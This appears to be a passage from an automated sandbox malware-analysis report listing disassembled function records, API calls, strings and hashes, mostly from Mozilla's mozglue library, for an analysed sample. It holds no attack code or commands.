                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6EA6B6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                    • String ID: 0$z
                                    • API String ID: 310210123-2584888582
                                    • Opcode ID: dc0f949a60604fb757028f9bf955aeda172b40ad9f10a0a9444deadf109931ba
                                    • Instruction ID: 3929bc3d94abefc4140fe14aae5a9638c0eb6d9cd24bfcb292f9e00ea9191224
                                    • Opcode Fuzzy Hash: dc0f949a60604fb757028f9bf955aeda172b40ad9f10a0a9444deadf109931ba
                                    • Instruction Fuzzy Hash: CB4145719097459FC341CF28C080A9BBBF4BFCA344F408A2EF49987691EB30D649CB96
                                    APIs
                                      • Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
                                      • Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
                                    • __Init_thread_footer.LIBCMT ref: 6C6B949F
                                    Strings
                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6B9459
                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6B946B
                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6B947D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                    • API String ID: 4042361484-1628757462
                                    • Opcode ID: dc48e73154d268757635c9044f6790d0e90ee258c5d7dc5c33bc0948c5cde651
                                    • Instruction ID: 07b182b5e4afa8086ebc153f9bf61c2f8978dac79f9d57a71c3fe89f3456b8eb
                                    • Opcode Fuzzy Hash: dc48e73154d268757635c9044f6790d0e90ee258c5d7dc5c33bc0948c5cde651
                                    • Instruction Fuzzy Hash: 0401F570A001018BD7109B5EE885A8972B79F0632CF040537D96AD6A52D632D86ACE5F
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: fa31853cd4fc3a424447cdc14e0979a9514e7597ece50002a78d3198b24a4922
                                    • Instruction ID: c3e3e2e4ea7b4c8436973a62f2768668fadd45ccbda81e4f148c8efd28dc138e
                                    • Opcode Fuzzy Hash: fa31853cd4fc3a424447cdc14e0979a9514e7597ece50002a78d3198b24a4922
                                    • Instruction Fuzzy Hash: 1AF0F831958208EFD745AFE0E909B5CBB79EB06703F108195F609C6190CB745A109B61
                                    APIs
                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6EB5B9
                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6EB5C5
                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6EB5DA
                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6EB5F4
                                    • __Init_thread_footer.LIBCMT ref: 6C6EB605
                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6EB61F
                                    • std::_Facet_Register.LIBCPMT ref: 6C6EB631
                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6EB655
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                    • String ID:
                                    • API String ID: 1276798925-0
                                    • Opcode ID: 3e88031275a852d068c8585365afcf28ce21800e449f588e6a5f7d6f06d02001
                                    • Instruction ID: 585f766e3c33a29d50fcc176319c6e47c5069a7b4a6e1e5e98de5d1b2ce720a8
                                    • Opcode Fuzzy Hash: 3e88031275a852d068c8585365afcf28ce21800e449f588e6a5f7d6f06d02001
                                    • Instruction Fuzzy Hash: AA317671B012058BCB009F5AD8955AEB7F6FFCA324F140516D51697740DB319806CFAE
                                    APIs
                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C67EB57,?,?,?,?,?,?,?,?,?), ref: 6C6AD652
                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C67EB57,?), ref: 6C6AD660
                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C67EB57,?), ref: 6C6AD673
                                    • free.MOZGLUE(?), ref: 6C6AD888
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: free$memsetmoz_xmalloc
                                    • String ID: Wgl$|Enabled
                                    • API String ID: 4142949111-1705841830
                                    • Opcode ID: 8895b6f3f7f8d82dee22133deb2cbd0d0e2a34d5cb21c19cffe399aaf78b7526
                                    • Instruction ID: abcaccc33ec9d53ed89f0115616f0c513573bf294f33fff4bea896b7a752711b
                                    • Opcode Fuzzy Hash: 8895b6f3f7f8d82dee22133deb2cbd0d0e2a34d5cb21c19cffe399aaf78b7526
                                    • Instruction Fuzzy Hash: 05A1F4B0A042049FDB14CFA9C4D07EEBBF1AF4A318F14805DD8956B781D731AD46CBA9
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6C1D0F
                                    • AcquireSRWLockExclusive.KERNEL32(?,?,6C6C1BE3,?,?,6C6C1D96,00000000), ref: 6C6C1D18
                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,6C6C1BE3,?,?,6C6C1D96,00000000), ref: 6C6C1D4C
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6C1DB7
                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6C1DC0
                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6C1DDA
                                      • Part of subcall function 6C6C1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6C1F03
                                      • Part of subcall function 6C6C1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6C1DF2,00000000,00000000), ref: 6C6C1F0C
                                      • Part of subcall function 6C6C1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6C1F20
                                    • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6C1DF4
                                      • Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                    • String ID:
                                    • API String ID: 1880959753-0
                                    • Opcode ID: fb8ae0c0e8ff074b35c116d1edfdef48cf9cc4f8d959297c1a9d3556843a01f1
                                    • Instruction ID: 87b6f7e6fb8b28c78e7420d25ee5798d46ffcc6e8b47c714924c4dade25a74c3
                                    • Opcode Fuzzy Hash: fb8ae0c0e8ff074b35c116d1edfdef48cf9cc4f8d959297c1a9d3556843a01f1
                                    • Instruction Fuzzy Hash: C34178B5200704AFCB10DF29D488A56BBF9FF89314F10446EE96A87B41CB31F814CB9A
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B84F3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B850A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B851E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B855B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B856F
                                    • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B85AC
                                      • Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B767F
                                      • Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B7693
                                      • Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B76A7
                                    • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B85B2
                                      • Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
                                      • Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
                                      • Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                    • String ID:
                                    • API String ID: 2666944752-0
                                    • Opcode ID: 9956e4d29cc473ffc7fa1ed7d9751bc67390ca44a340ad85e89fddfdc68e6e42
                                    • Instruction ID: 8a4e4d232d8c695056e70d0e3de8fdaf23a19fc81d7256e76eb7b140880a4fc2
                                    • Opcode Fuzzy Hash: 9956e4d29cc473ffc7fa1ed7d9751bc67390ca44a340ad85e89fddfdc68e6e42
                                    • Instruction Fuzzy Hash: 1221BC752006029FDB24DF29D888A5AB7B5BF8830CF24082DE55BD3B41DB31F969CB59
                                    APIs
                                      • Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
                                      • Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
                                      • Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
                                      • Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6BF559
                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BF561
                                      • Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
                                      • Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6BF577
                                    • AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF585
                                    • ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF5A3
                                    Strings
                                    • [I %d/%d] profiler_resume_sampling, xrefs: 6C6BF499
                                    • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C6BF56A
                                    • [I %d/%d] profiler_resume, xrefs: 6C6BF239
                                    • [I %d/%d] profiler_pause_sampling, xrefs: 6C6BF3A8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                    • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                    • API String ID: 2848912005-2840072211
                                    • Opcode ID: 687b46bf4ad0d60fbf97dd6e567e2e01a5d650596f01ca286131d98661cabb2b
                                    • Instruction ID: b60560caeb40cccd978832d551a2d1389d2ab47c8d2abb43e4d590c8d0ae9750
                                    • Opcode Fuzzy Hash: 687b46bf4ad0d60fbf97dd6e567e2e01a5d650596f01ca286131d98661cabb2b
                                    • Instruction Fuzzy Hash: DAF0547A6002049BEB006F66A88895E77BFFFD729DF000415EA6593702DB754806C77E
                                    APIs
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C6ACFAE,?,?,?,6C6731A7), ref: 6C6B05FB
                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C6ACFAE,?,?,?,6C6731A7), ref: 6C6B0616
                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6731A7), ref: 6C6B061C
                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6731A7), ref: 6C6B0627
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: _writestrlen
                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                    • API String ID: 2723441310-2186867486
                                    • Opcode ID: 6297b76c3663be4c7ea528a0ec1fe5dfb7e62dcb0351d3c95e8d9d77dab87220
                                    • Instruction ID: 77f17740782a811ad2d48a0e3e683afc2b5590e89693ebbc5f72f88c815c23f0
                                    • Opcode Fuzzy Hash: 6297b76c3663be4c7ea528a0ec1fe5dfb7e62dcb0351d3c95e8d9d77dab87220
                                    • Instruction Fuzzy Hash: 1FE086E290601037F514225A7C8ADBB7A1CDBC6134F04003AFE0D43301E94AAD1951FA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 875321ad875b0758aacc97abb2aac577ee9a7eacb8681cb0075a18cffc676d6d
                                    • Instruction ID: 8d089980d129f17d6d22bd3c460bcdbb039e9a994919aed92a282c6bca511694
                                    • Opcode Fuzzy Hash: 875321ad875b0758aacc97abb2aac577ee9a7eacb8681cb0075a18cffc676d6d
                                    • Instruction Fuzzy Hash: 8BA14AB0A02645CFDB24CF29C594A99FBF1BF49304F448A6ED45A97B00E731A985CFA4
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D14C5
                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D14E2
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6D1546
                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C6D15BA
                                    • free.MOZGLUE(?), ref: 6C6D16B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                    • String ID:
                                    • API String ID: 1909280232-0
                                    • Opcode ID: d87de9ec82f7de81effe7751b196bb776a8d377e9b11ed042cc4bd8f70877c03
                                    • Instruction ID: f394cbac3c3d8b47307519e35e12f3c4c6f095c2f65188829e6e68ddf796e467
                                    • Opcode Fuzzy Hash: d87de9ec82f7de81effe7751b196bb776a8d377e9b11ed042cc4bd8f70877c03
                                    • Instruction Fuzzy Hash: 0661FD72A007409BDB218F21C880BDAB7B1FF8A318F05851DED8A57701DB75E949CB9A
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 6C6CDC60
                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6CD38A,?), ref: 6C6CDC6F
                                    • free.MOZGLUE(?,?,?,?,?,6C6CD38A,?), ref: 6C6CDCC1
                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6CD38A,?), ref: 6C6CDCE9
                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6CD38A,?), ref: 6C6CDD05
                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6CD38A,?), ref: 6C6CDD4A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                    • String ID:
                                    • API String ID: 1842996449-0
                                    • Opcode ID: 084958399cf68daf00241f846c199e68ca59a1c5c8db314d96a79ea24b86dfe1
                                    • Instruction ID: 5f8b6ee52171de9c5daf5d629b5abf3e41294ec5bf70a6e0015562b086640966
                                    • Opcode Fuzzy Hash: 084958399cf68daf00241f846c199e68ca59a1c5c8db314d96a79ea24b86dfe1
                                    • Instruction Fuzzy Hash: BF418DB5B00205CFCB00CF99C88099AB7FAFF89314B554569DA46ABB10DB71FC01CB99
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
